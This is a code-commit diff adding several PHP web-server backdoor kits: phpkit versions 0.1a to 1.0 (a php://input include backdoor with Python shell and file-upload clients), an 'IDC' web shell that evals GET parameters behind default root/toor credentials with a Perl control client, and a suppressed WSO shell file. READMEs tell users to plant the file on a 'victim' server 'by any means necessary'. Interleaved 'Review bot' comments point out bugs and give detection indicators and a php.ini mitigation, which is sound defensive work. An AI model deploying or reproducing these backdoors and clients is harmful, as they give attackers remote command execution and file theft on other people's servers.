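Review bot: The five `//` lines sit above `<?php`, so PHP treats them as literal output rather than comments, and every response from this file begins with that text; the same applies to php/phpkit-0.2a/odd.php. That makes the response body a dependable signature for the unmodified sample, alongside the static pattern `include('php://input')`, which scanners keyed only on `eval`/`system` will miss. The `ini_set('allow_url_include, 1')` call passes one string instead of a name and a value. `allow_url_include` is also a system-level directive that a script cannot change, so the sample only functions where the server already has it enabled. Keeping `allow_url_include = Off` in php.ini is the mitigation, consistent with the failure cases the 0.2a README describes.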
28
php/phpkit-0.1a/phpkit.py
Normal file
28
php/phpkit-0.1a/phpkit.py
Normal file
|
@ -0,0 +1,28 @@
|
|||
#!/usr/bin/python
|
||||
# Client for the php://input based backdoor
|
||||
# Website: insecurety.net
|
||||
# Author: infodox
|
||||
# Twitter: @info_dox
|
||||
# Insecurety Research - 2013
|
||||
import requests
|
||||
import sys
|
||||
|
||||
if (len(sys.argv) != 2):
|
||||
print "Usage: " + sys.argv[0] + " <url of backdoor>"
|
||||
print "Example: " + sys.argv[0] + " http://localhost/odd.php"
|
||||
sys.exit(0)
|
||||
|
||||
url = sys.argv[1]
|
||||
print "\n[+] URL in use: %s \n" %(url)
|
||||
while True:
|
||||
cmd = raw_input("shell:~$ ")
|
||||
if cmd == "quit":
|
||||
print "\n[-] Quitting"
|
||||
sys.exit(0)
|
||||
elif cmd == "exit":
|
||||
print "\n[-] Quitting"
|
||||
sys.exit(0)
|
||||
else:
|
||||
payload = """<?php system('%s'); ?>""" %(cmd)
|
||||
hax = requests.post(url, payload)
|
||||
print hax.text
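Review bot: The line `payload = """<?php system('%s'); ?>""" %(cmd)` sends PHP source as the raw POST body, and the header comment does not say so. Documenting it makes the client a usable reference for network detection: `# Wire indicator: POST body is "<?php system('...'); ?>", sent with python-requests`. A request body that starts with `<?php` has no legitimate use against a normal application, so a WAF or IDS rule on that prefix covers this client regardless of the command typed. The 0.2a client in this commit wraps the body in `eval(base64_decode(...))` instead, so the rule should key on the `<?php` prefix rather than on `system(`.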
|
10
php/phpkit-0.2a/CHANGELOG
Normal file
10
php/phpkit-0.2a/CHANGELOG
Normal file
|
@ -0,0 +1,10 @@
|
|||
Changelog of phpkit development
|
||||
--
|
||||
0.1a - 07/01 (Jan)/2013 - Initial Commit
|
||||
0.1b - 08/01 (Jan)/2013 - Major Upgrade. Now tests for system(), shell_exec() and passthru()
|
||||
Uses simple logic to choose the first one that works.
|
||||
Needs code cleanup soon, and implementation of exec() :)
|
||||
0.2a - 17/01 (Jan)/2013 - Realized I was still thinking it was January. Updated the client a bit.
|
||||
Preparing for the 0.2a release by finishing the upload client and writing
|
||||
documentation for it. Code is a lot cleaner now though. Still need to fix
|
||||
the bloody "test" function :/
|
100
php/phpkit-0.2a/README
Normal file
100
php/phpkit-0.2a/README
Normal file
|
@ -0,0 +1,100 @@
|
|||
/$$$$$$$ /$$ /$$ /$$$$$$$ /$$ /$$ /$$
|
||||
| $$__ $$| $$ | $$| $$__ $$| $$ |__/ | $$
|
||||
| $$ \ $$| $$ | $$| $$ \ $$| $$ /$$ /$$ /$$$$$$
|
||||
| $$$$$$$/| $$$$$$$$| $$$$$$$/| $$ /$$/| $$|_ $$_/
|
||||
| $$____/ | $$__ $$| $$____/ | $$$$$$/ | $$ | $$
|
||||
| $$ | $$ | $$| $$ | $$_ $$ | $$ | $$ /$$
|
||||
| $$ | $$ | $$| $$ | $$ \ $$| $$ | $$$$/
|
||||
|__/ |__/ |__/|__/ |__/ \__/|__/ \____/
|
||||
|
||||
phpkit-0.2a
|
||||
|
||||
Stealth PHP Backdooring Utility - Insecurety Research 2013
|
||||
|
||||
This is a simple kit to demonstrate a very effective way of
|
||||
backdooring a webserver running PHP.
|
||||
Essentially, it functions by parsing out any valid PHP code
|
||||
from raw HTTP POST data sent to it, and executing said PHP.
|
||||
|
||||
No eval() or other suspect calls are in the serverside script,
|
||||
the code is executed by the include() function. The php://input
|
||||
data stream (which is basically "anything sent via raw POST) is
|
||||
used to "capture" the raw POST data, and when parsed by include()
|
||||
the code sent is executed.
|
||||
|
||||
This allows for many things to be done, i.e. executing any PHP
|
||||
code you happen to write. The example client, phpkit.py, simply
|
||||
gives a "shell prompt" (non interactive, each command is executed
|
||||
in a new "context") on the victim server. It is trivial to write
|
||||
pretty much anything.
|
||||
|
||||
This release includes a massively overhauled backdoor client, it
|
||||
tests various execution functions against the victim host before
|
||||
using whatever one works first. It is massively ugly code, but
|
||||
I intend to clean it up soonish.
|
||||
|
||||
This release also includes a basic file uploader :)
|
||||
|
||||
USAGE (backdoor part):
|
||||
You upload "odd.php" to the target webserver by any means necessary.
|
||||
You then run ./phpkit.py <url to php file on server> and enjoy!
|
||||
|
||||
Example Use:
|
||||
[infodox@sahara:~/phpkit]$ ./phpkit.py http://localhost/odd.php
|
||||
|
||||
[+] URL in use: http://localhost/odd.php
|
||||
|
||||
[+] Testing system function
|
||||
[+] system() function works
|
||||
shell:~$ id
|
||||
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||
|
||||
shell:~$ uname -a
|
||||
Linux sahara 3.2.0-4-amd64 #1 SMP Debian 3.2.32-1 x86_64 GNU/Linux
|
||||
|
||||
USAGE (file uploader part):
|
||||
This assumes "odd.php" is loaded onto the victim webserver, obviously.
|
||||
You run ./upload.py <url to odd.php> <file to upload> <remote path>
|
||||
Only works if remote path is writeable. /tmp/ is always good :)
|
||||
|
||||
Example Use:
|
||||
[infodox@sahara:~/phpkit]$ python upload.py http://localhost/odd.php /etc/passwd /tmp/pass
|
||||
[+] Uploading File
|
||||
[+] Upload should be complete
|
||||
|
||||
So the file uploaded, now I compare MD5sums to check did it bloody well work!
|
||||
[infodox@sahara:~/phpkit]$ md5sum /etc/passwd
|
||||
2568416e280af88f82e982efd46525a8 /etc/passwd
|
||||
[infodox@sahara:~/phpkit]$ md5sum /tmp/pass
|
||||
2568416e280af88f82e982efd46525a8 /tmp/pass
|
||||
|
||||
Seems legit bro ;)
|
||||
|
||||
TODO:
|
||||
MySQL client.
|
||||
|
||||
|
||||
Notes:
|
||||
In two use-cases this was shown to not function.
|
||||
Use Case A: Servers with the Suhosin PHP Hardening Patches.
|
||||
In this case, php://input and other URL inclusion vectors are rendered
|
||||
unuseable due to the protections the Suhosin patches offer. i.e. this
|
||||
tool don't work against Suhosin patched boxes.
|
||||
|
||||
Use Case B: Servers where php.ini is dictated by httpd.conf
|
||||
In several cases where the php.ini is specific to the HTTP daemon,
|
||||
runtime ini directive modification is not permissable. I have
|
||||
personally observed this behaviour on Apache thus far, however
|
||||
further testing/research is needed to find a workaround of some kind.
|
||||
|
||||
Please report if you have any issues getting this to work. Please
|
||||
test it on a server with allow_url_include = On , then if it works,
|
||||
set allow_url_include = Off , restart httpd, and check does it work.
|
||||
If it does not work, please report using the issue tracker at
|
||||
http://code.google.com/p/insecurety-research providing details of HTTPD
|
||||
configuration so I can attempt to figure out new things :)
|
||||
|
||||
Questions, comments, bug reports and abuse? infodox () insecurety.net
|
||||
|
||||
Licence: The do whatever you want with it, just don't rip code without
|
||||
giving credit licence.
|
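--- a/php/phpkit-0.2a/odd.php
+++ b/php/phpkit-0.2a/odd.php
@@ -0,0 +1,10 @@
+// php://input based backdoor
+// uses include('php://input') to execute arbritary code
+// Any valid PHP code sent as raw POST data to backdoor is ran
+// overrides the php.ini settings using ini_set :)
+// Insecurety Research 2013 | insecurety.net
+<?php
+ini_set('allow_url_include, 1'); // Allow url inclusion in this script
+// No eval() calls, no system() calls, nothing normally seen as malicious.
+include('php://input');
+?>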
106
php/phpkit-0.2a/phpkit.py
Normal file
106
php/phpkit-0.2a/phpkit.py
Normal file
|
@ -0,0 +1,106 @@
|
|||
#!/usr/bin/python
|
||||
# Client for the php://input based backdoor
|
||||
# Website: insecurety.net
|
||||
# Author: infodox
|
||||
# Twatter: @info_dox
|
||||
# Insecurety Research - 2013
|
||||
# version: 0.2a
|
||||
|
||||
import requests
|
||||
import sys
|
||||
|
||||
if (len(sys.argv) != 2):
|
||||
print "Usage: " + sys.argv[0] + " <url of backdoor>"
|
||||
print "Example: " + sys.argv[0] + " http://localhost/odd.php"
|
||||
sys.exit(0)
|
||||
|
||||
url = sys.argv[1]
|
||||
tester = """echo w00tw00tw00t"""
|
||||
testkey = """w00tw00tw00t"""
|
||||
print "\n[+] URL in use: %s \n" %(url)
|
||||
|
||||
### ###
|
||||
# Whole Bunch of Functions #
|
||||
### ###
|
||||
def genphp(func, cmd):
|
||||
if func == "system":
|
||||
rawphp = """system('%s');""" %(cmd)
|
||||
elif func == "shellexec":
|
||||
rawphp = """echo shell_exec('%s');""" %(cmd)
|
||||
elif func == "passthru":
|
||||
rawphp = """passthru('%s');""" %(cmd)
|
||||
elif func == "exec":
|
||||
rawphp = """echo exec('%s');""" %(cmd)
|
||||
encodedphp = rawphp.encode('base64')
|
||||
payload = """<?php eval(base64_decode('%s')); ?>""" %(encodedphp)
|
||||
return payload
|
||||
|
||||
def test(url, tester, testkey): # This whole function is ugly as sin
|
||||
print "[+] Testing system()" # I need to make it tighter
|
||||
payload = genphp('system', tester) # No, really. Look at the waste
|
||||
r = requests.post(url, payload) # It could be TIIINY and fast!
|
||||
if testkey in r.text:
|
||||
print "[+] system() works, using system."
|
||||
func = 'system'
|
||||
return func
|
||||
else:
|
||||
print "[-] system() seems disabled :("
|
||||
pass
|
||||
print "[+] Testing shell_exec()" # LOOK AT THE FORKING CODE REUSE
|
||||
payload = genphp('shellexec', tester) # THIS COULD BE TINY
|
||||
r = requests.post(url, payload) # But. Coffee is lacking
|
||||
if testkey in r.text:
|
||||
print "[+] shell_exec() works, using shell_exec"
|
||||
func = 'shellexec'
|
||||
return func
|
||||
else:
|
||||
print "[-] shell_exec() seems disabled :("
|
||||
pass
|
||||
print "[+] Testing passthru()"
|
||||
payload = genphp('passthru', tester)
|
||||
r = requests.post(url, payload)
|
||||
if testkey in r.text:
|
||||
print "[+] passthru() works, using passthru"
|
||||
func = 'passthru'
|
||||
return func
|
||||
else:
|
||||
print "[-] passthru() seems disabled :("
|
||||
pass
|
||||
print "[+] Testing exec()"
|
||||
payload = genphp('exec', tester)
|
||||
r = requests.post(url, payload)
|
||||
if testkey in r.text:
|
||||
print "[+] exec() works, using exec"
|
||||
func = 'exec'
|
||||
return func
|
||||
else:
|
||||
print "[-] exec() seems disabled :("
|
||||
pass
|
||||
|
||||
### ###
|
||||
# End of functions and object oriented stuff #
|
||||
### ###
|
||||
|
||||
# the main body
|
||||
func = test(url, tester, testkey)
|
||||
while True:
|
||||
try:
|
||||
cmd = raw_input("shell:~$ ")
|
||||
if cmd == "quit":
|
||||
print "\n[-] Quitting"
|
||||
sys.exit(0)
|
||||
elif cmd == "exit":
|
||||
print "\n[-] Quitting"
|
||||
sys.exit(0)
|
||||
else:
|
||||
try:
|
||||
payload = genphp(func, cmd)
|
||||
hax = requests.post(url, payload)
|
||||
print hax.text
|
||||
except Exception or KeyboardInterrupt:
|
||||
print "[-] Exception Caught, I hope"
|
||||
sys.exit(0)
|
||||
except Exception or KeyboardInterrupt:
|
||||
print "[-] Exception or CTRL+C Caught, I hope"
|
||||
print "[-] Exiting (hopefully) cleanly..."
|
||||
sys.exit(0)
|
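--- a/php/phpkit-0.2a/upload.py
+++ b/php/phpkit-0.2a/upload.py
@@ -0,0 +1,34 @@
+#!/usr/bin/python
+# Upload.py
+# File Upload client for the php://input based backdoor
+# Website: insecurety.net
+# Author: infodox
+# Twatter: @info_dox
+# Insecurety Research - 2013
+# version: 0.2a
+import requests
+import sys
+
+if (len(sys.argv) != 4):
+print "Usage: " + sys.argv[0] + " <url of backdoor> <localfile> <remotefile>"
+print "Example: " + sys.argv[0] + " http://localhost/odd.php reverseshell.py /tmp/rsh.py"
+sys.exit(0)
+
+url = sys.argv[1]
+localfile = sys.argv[2]
+remotefile = sys.argv[3]
+
+f = open(localfile, "r")
+rawfiledata = f.read()
+encodedfiledata = rawfiledata.encode('base64')
+
+phppayload = """<?php
+$f = fopen("%s", "a");
+$x = base64_decode('%s');
+fwrite($f, "$x");
+fclose($f);
+?>""" %(remotefile, encodedfiledata) # I need to add a hashing function sometime for corruption test.
+
+print "[+] Uploading File"
+requests.post(url, phppayload) # this is why I love the python requests library
+print "[+] Upload should be complete"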
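Review bot: The script prints `[+] Upload should be complete` without looking at the result of `requests.post(url, phppayload)`, and the generated PHP opens the remote path with `fopen("%s", "a")`, so a repeated run appends to an existing file rather than replacing it; neither is documented. For anyone analysing traffic or artefacts left by this client, that means the file on disk need not hash to the local source, and the request itself is a raw POST whose body starts with `<?php` and wraps the file contents in `base64_decode(`. I would record that above the payload template: `# body is PHP source: fopen(<remotefile>, "a") + fwrite(base64_decode(<data>)); response is not checked`.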
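--- a/php/phpkit-1.0/README.txt
+++ b/php/phpkit-1.0/README.txt
@@ -0,0 +1,97 @@
+/$$$$$$$ /$$ /$$ /$$$$$$$ /$$ /$$ /$$
+| $$__ $$| $$ | $$| $$__ $$| $$ |__/ | $$
+| $$ \ $$| $$ | $$| $$ \ $$| $$ /$$ /$$ /$$$$$$
+| $$$$$$$/| $$$$$$$$| $$$$$$$/| $$ /$$/| $$|_ $$_/
+| $$____/ | $$__ $$| $$____/ | $$$$$$/ | $$ | $$
+| $$ | $$ | $$| $$ | $$_ $$ | $$ | $$ /$$
+| $$ | $$ | $$| $$ | $$ \ $$| $$ | $$$$/
+|__/ |__/ |__/|__/ |__/ \__/|__/ \____/
+
+phpkit-1.0
+
+Stealth PHP Backdooring Utility - Insecurety Research 2013
+
+This is a simple kit to demonstrate a very effective way of
+backdooring a webserver running PHP.
+Essentially, it functions by parsing out any valid PHP code
+from raw HTTP POST data sent to it, and executing said PHP.
+
+No eval() or other suspect calls are in the serverside script,
+the code is executed by the include() function. The php://input
+data stream (which is basically "anything sent via raw POST) is
+used to "capture" the raw POST data, and when parsed by include()
+the code sent is executed.
+
+This allows for many things to be done, i.e. executing any PHP
+code you happen to write. The example client, phpkitcli.py, offers
+file upload and a remote shell.
+
+This release includes a massively overhauled backdoor client, it
+tests various execution functions against the victim host before
+using whatever one works first. It is massively ugly code, but
+I intend to clean it up soonish.
+
+USAGE (backdoor part):
+You upload "odd.php" to the target webserver by any means necessary.
+You then run ./phpkitcli.py --url <url to php file on server> and enjoy!
+
+Example Use:
+[infodox@sahara:~/phpkit]$ ./phpkitcli.py --url http://localhost/odd.php
+
+[+] URL in use: http://localhost/odd.php
+
+[+] Testing system function
+[+] system() function works
+shell:~$ id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+shell:~$ uname -a
+Linux sahara 3.2.0-4-amd64 #1 SMP Debian 3.2.32-1 x86_64 GNU/Linux
+
+USAGE (file uploader part):
+This assumes "odd.php" is loaded onto the victim webserver, obviously.
+You run:
+./phpkitcli.py --url <url to odd.php> --lfile <file to upload> --rfile <remote path> --mode UPLOAD
+Only works if remote path is writeable. /tmp/ is always good :)
+
+Example Use:
+[infodox@sahara:~/phpkit]$ ./phpkitcli.py --url http://localhost/odd.php --mode UPLOAD --lfile /etc/passwd --rfile /tmp/pass
+[+] Uploading File
+[+] Upload should be complete
+
+So the file uploaded, now I compare MD5sums to check did it bloody well work!
+[infodox@sahara:~/phpkit]$ md5sum /etc/passwd
+2568416e280af88f82e982efd46525a8 /etc/passwd
+[infodox@sahara:~/phpkit]$ md5sum /tmp/pass
+2568416e280af88f82e982efd46525a8 /tmp/pass
+
+Seems legit bro ;)
+
+TODO:
+MySQL client.
+
+
+Notes:
+In two use-cases this was shown to not function.
+Use Case A: Servers with the Suhosin PHP Hardening Patches.
+In this case, php://input and other URL inclusion vectors are rendered
+unuseable due to the protections the Suhosin patches offer. i.e. this
+tool don't work against Suhosin patched boxes.
+
+Use Case B: Servers where php.ini is dictated by httpd.conf
+In several cases where the php.ini is specific to the HTTP daemon,
+runtime ini directive modification is not permissable. I have
+personally observed this behaviour on Apache thus far, however
+further testing/research is needed to find a workaround of some kind.
+
+Please report if you have any issues getting this to work. Please
+test it on a server with allow_url_include = On , then if it works,
+set allow_url_include = Off , restart httpd, and check does it work.
+If it does not work, please report using the issue tracker at
+http://code.google.com/p/insecurety-research providing details of HTTPD
+configuration so I can attempt to figure out new things :)
+
+Questions, comments, bug reports and abuse? infodox () insecurety.net
+
+Licence: The do whatever you want with it, just don't rip code without
+giving credit licence.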
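--- a/php/phpkit-1.0/odd.php
+++ b/php/phpkit-1.0/odd.php
@@ -0,0 +1,5 @@
+<?php
+ini_set('allow_url_include, 1'); // Allow url inclusion in this script
+// No eval() calls, no system() calls, nothing normally seen as malicious.
+include('php://input');
+?>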
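Review bot: `ini_set('allow_url_include, 1')` passes a single string rather than a name and a value, so as far as I can tell the call cannot change the setting (a parameter-count warning on older PHP, an argument-count error on PHP 8), and the comment beside it is misleading. To my knowledge allow_url_include is a system-level directive that ini_set() cannot alter at run time in any case, which fits the README's "Use Case B"; `include('php://input')` therefore only executes a request body where the server configuration already has the directive On. I would replace the comment with `// has no effect: wrong arguments; include of php://input depends on allow_url_include being On in server config`. A PHP file whose only real statement is an include of `php://input` is also a useful thing to search a web root for, since the file contains none of the function names scanners usually key on.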
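--- a/php/phpkit-1.0/phpkitcli.py
+++ b/php/phpkit-1.0/phpkitcli.py
@@ -0,0 +1,132 @@
+#!/usr/bin/python
+import argparse
+import requests
+import sys
+
+help = """Connects to a phpkit backdoor and provides file upload or shell access"""
+parser = argparse.ArgumentParser(description=help)
+parser.add_argument("--url", help="URL of backdoor", required=True)
+parser.add_argument("--mode", help="UPLOAD or SHELL", default="SHELL")
+parser.add_argument("--lfile", help="File to Upload (full path)")
+parser.add_argument("--rfile", help="Where to put the file on the server (full path)")
+args = parser.parse_args()
+
+url = args.url
+mode = args.mode
+localfile = args.lfile
+remotefile = args.rfile
+
+tester = """echo w00tw00tw00t"""
+testkey = """w00tw00tw00t"""
+print "\n[+] URL in use: %s \n" %(url)
+
+### ###
+# Whole Bunch of Functions #
+### ###
+def genphp(func, cmd):
+if func == "system":
+rawphp = """system('%s');""" %(cmd)
+elif func == "shellexec":
+rawphp = """echo shell_exec('%s');""" %(cmd)
+elif func == "passthru":
+rawphp = """passthru('%s');""" %(cmd)
+elif func == "exec":
+rawphp = """echo exec('%s');""" %(cmd)
+encodedphp = rawphp.encode('base64')
+payload = """<?php eval(base64_decode('%s')); ?>""" %(encodedphp)
+return payload
+
+def test(url, tester, testkey): # This whole function is ugly as sin
+print "[+] Testing system()" # I need to make it tighter
+payload = genphp('system', tester) # No, really. Look at the waste
+r = requests.post(url, payload) # It could be TIIINY and fast!
+if testkey in r.text:
+print "[+] system() works, using system."
+func = 'system'
+return func
+else:
+print "[-] system() seems disabled :("
+pass
+print "[+] Testing shell_exec()" # LOOK AT THE FORKING CODE REUSE
+payload = genphp('shellexec', tester) # THIS COULD BE TINY
+r = requests.post(url, payload) # But. Coffee is lacking
+if testkey in r.text:
+print "[+] shell_exec() works, using shell_exec"
+func = 'shellexec'
+return func
+else:
+print "[-] shell_exec() seems disabled :("
+pass
+print "[+] Testing passthru()"
+payload = genphp('passthru', tester)
+r = requests.post(url, payload)
+if testkey in r.text:
+print "[+] passthru() works, using passthru"
+func = 'passthru'
+return func
+else:
+print "[-] passthru() seems disabled :("
+pass
+print "[+] Testing exec()"
+payload = genphp('exec', tester)
+r = requests.post(url, payload)
+if testkey in r.text:
+print "[+] exec() works, using exec"
+func = 'exec'
+return func
+else:
+print "[-] exec() seems disabled :("
+pass
+
+###
+def shell(func):
+func = test(url, tester, testkey)
+while True:
+try:
+cmd = raw_input("shell:~$ ")
+if cmd == "quit":
+print "\n[-] Quitting"
+sys.exit(0)
+elif cmd == "exit":
+print "\n[-] Quitting"
+sys.exit(0)
+else:
+try:
+payload = genphp(func, cmd)
+hax = requests.post(url, payload)
+print hax.text
+except Exception or KeyboardInterrupt:
+print "[-] Exception Caught, I hope"
+sys.exit(0)
+except Exception or KeyboardInterrupt:
+print "[-] Exception or CTRL+C Caught, I hope"
+print "[-] Exiting (hopefully) cleanly..."
+sys.exit(0)
+
+def upload(url, localfile, remotefile):
+f = open(localfile, "r")
+rawfiledata = f.read()
+encodedfiledata = rawfiledata.encode('base64')
+phppayload = """<?php
+$f = fopen("%s", "a");
+$x = base64_decode('%s');
+fwrite($f, "$x");
+fclose($f);
+?>""" %(remotefile, encodedfiledata) # I need to add a hashing function sometime for corruption test.
+
+print "[+] Uploading File"
+requests.post(url, phppayload) # this is why I love the python requests library
+print "[+] Upload should be complete"
+sys.exit(0)
+
+def main(url, localfile, remotefile, mode):
+if mode == "UPLOAD":
+upload(url, localfile, remotefile)
+elif mode == "SHELL":
+func = test(url, test, testkey)
+shell(func)
+else:
+print "[-] Mode Invalid... Exit!"
+sys.exit(0)
+
+main(url, localfile, remotefile, mode)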
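Review bot: Nothing in the file documents what the client puts on the wire, which is what a reader analysing logs needs: every request built by `genphp` is a raw POST whose body is `<?php eval(base64_decode('…')); ?>`, and `test` looks for the marker `w00tw00tw00t` in the response. In `main`, `test(url, test, testkey)` passes the function object `test` where the `tester` string is expected, and `shell` then overwrites its `func` argument by calling `test` again, so a SHELL session appears to begin with two rounds of probes, the first of which cannot match. If every probe fails, `test` falls off the end and returns None, and `genphp` then reaches `rawphp.encode` with `rawphp` unassigned. I would add above `genphp`: `# request body: <?php eval(base64_decode('<b64 of a system|shell_exec|passthru|exec call>')); ?> sent as raw POST`.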
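--- a/php/wsb/ReadMe.txt
+++ b/php/wsb/ReadMe.txt
@@ -0,0 +1,7 @@
+#Web Shell BackDoor
+For using this tool you must follow this steps :
+1- Upload the php Agent (idc.php) into server
+2- Run the perl script (wsb.pl) on your machine
+3- Give the address of the agent to the perl script
+4- Using this username and password : user :root , pass : toor
+5- Enter Your Commands;)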
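--- a/php/wsb/idc.php
+++ b/php/wsb/idc.php
@@ -0,0 +1,7 @@
+<?php
+$user="63a9f0ea7bb98050796b649e85481845"; #root
+$pass="7b24afc8bc80e548d66c4e7ff72171c5"; #toor
+
+if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)
+{eval($_GET['idc']);}
+?>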
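Review bot: The gate on `eval($_GET['idc'])` is two unsalted MD5 digests whose plaintexts are given in the trailing comments (`#root`, `#toor`) and in ReadMe.txt, compared with loose `==`, so it should be read as no access control at all. Credentials and the code to evaluate all arrive in the query string, which means each use is normally recorded in the web server's access log under the parameter names `usr`, `pass` and `idc`. I would state that in a header comment, for example `# unauthenticated in practice: default creds, MD5, ==; request is GET ?usr=&pass=&idc=<php>`, since the two digest strings and the parameter names are the stable things to match on when hunting for this file or its traffic.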
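--- a/php/wsb/wsb.pl
+++ b/php/wsb/wsb.pl
@@ -0,0 +1,109 @@
+#IDC php BackDoor
+#Iranian Dark Coders Team
+#WwW.IDC-TeaM.NeT
+#Coded BY M.R.S.CO
+#We Are M.R.S.CO,N3O,UB313,Black.Hack3r
+#Friends : G3n3Rall,MR.CILILI,BlacK.King,Nafsh,b3hz4d,E2MA3N,Skote_Vahshat,Bl4ck.Viper,Mr.Xpr
+system(($^O eq 'MSWin32') ? 'cls' : 'clear');
+print q (
+
+__ __ __
+| | _|_ {_ |_ _|| |__} _ _| | \ _ _ _
+|/\|{-|_} __}| }{-|| |__}{_|{_|{|__/{_}{_}|
+
+--=[Web Shell BackDoor]
++---++---==[Version : 1.1]
++---++---==[Coded by : M.R.S.CO]
++---++---==[WwW.IDC-TeaM.Net]
+--=[Iranian Dark Coders Team]
+);
+use LWP::Simple;
+print "\nEnter Shell URL : ";
+chomp($url=<STDIN>);
+
+print "\nEnter UserName : ";
+chomp($usr=<STDIN>);
+
+print "Enter PassWord : ";
+chomp($pass=<STDIN>);
+
+
+print "\nStart analyze shell\n";
+@fun=("system","passthru","exec","shell_exec");
+$tf="false";
+foreach(@fun)
+{
+$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('echo www.idc-team.net');";
+if ($source =~ m/idc-team/i){
+print "\nConected\nFor more information Enter \"help\"";
+do {
+print "\nWSB : ";
+chomp($cmd=<STDIN>);
+if ($cmd=~"help")
+{
+print q (
+================================================================
+
+command Description
+------- --------------------------
+help The help command display the help menu
+getuid The 'getuid' command will display the user
+lpwd display the filename of the current working directory
+ps The 'ps' command display the list of running processes.
+shell It display the standard shell
+dir The 'dir' command List information about the FILEs
+download The 'download' command downloads a file from the remote machine
+sym The 'sym' command create a symlink
+);
+}elsif ($cmd=~"getuid"){
+$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('id');";
+print "\nUser id = $source";
+}elsif ($cmd=~"dir"){
+$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('ls -la');";
+print "\n $source";
+}elsif ($cmd=~"lpwd"){
+$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('pwd');";
+print "\n$source";
+}elsif ($cmd=~"ps"){
+$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('ps -A');";
+print "\n$source";
+}elsif ($cmd=~"exit"){
+exit 0;
+}elsif ($cmd=~"sym"){
+print "Enter Target Path (/home/idc/public_html/config.php)\nEnter Target Path : ";
+chomp($target=<STDIN>);
+print "\nEnter symlink Path (/home/me/public_html/sym.txt)\nEnter symlink Path : ";
+chomp($sym=<STDIN>);
+$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('ln -s $target $sym');";
+$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_(\'perl -e \"symlink('$target','$sym')\"\');";
+$source=get $url."?usr=".$usr."&pass=".$pass."&idc=symlink('$target','$sym');";
+print "\nSymlink \"$sym\" Was Created;)\n";
+}elsif ($cmd=~"download"){
+print "Enter File Path (/home/idc/public_html/test.zip)\nEnter File Path : ";
+chomp($ff=<STDIN>);
+print "\nEnter Save Path : ";
+chomp($fp=<STDIN>);
+$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('cat $ff');";
+open (fdl, '>>'.$fp);
+print fdl "$source";
+close (fdl);
+print "\File \"$ff\" Was Downloaded to $fp\n";
+}elsif ($cmd=~"shell"){
+$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_(\"uname -an\");";
+print "\n$source";
+do {
+print "\ncmd : ";
+chomp($cm=<STDIN>);
+$source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_(\"$cm\");";
+print "\n$source";
+if ($cm=~"exit"){goto ou;}
+}while ($==1)
+}else{
+print "\"$cmd\" Command NotFound 404;) \nFor more information Enter \"help\"";
+}
+ou:;
+}while ($==1)
+}
+$tf="true";
+}
+if($tf="true") {print "Cant connect to server !!\n";}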
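Review bot: The header comments carry only credits and say nothing about the request format, which is `GET <url>?usr=…&pass=…&idc=<function>('<command>');` with the operator's input concatenated in unencoded; the connection probe inside the `foreach` sends `echo www.idc-team.net` through each of `system`, `passthru`, `exec` and `shell_exec` in turn. The closing `if($tf="true")` assigns rather than compares, so `Cant connect to server !!` is printed whenever the loop ends and says nothing about whether a probe matched. I would add a comment above the `foreach` such as `# probe: ?usr=&pass=&idc=<fn>('echo www.idc-team.net'); once per entry in @fun`, and note there that the full command string of every request ends up in the target's access log.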
1522
php/wso2.5.1.php
Normal file
1522
php/wso2.5.1.php
Normal file
File diff suppressed because it is too large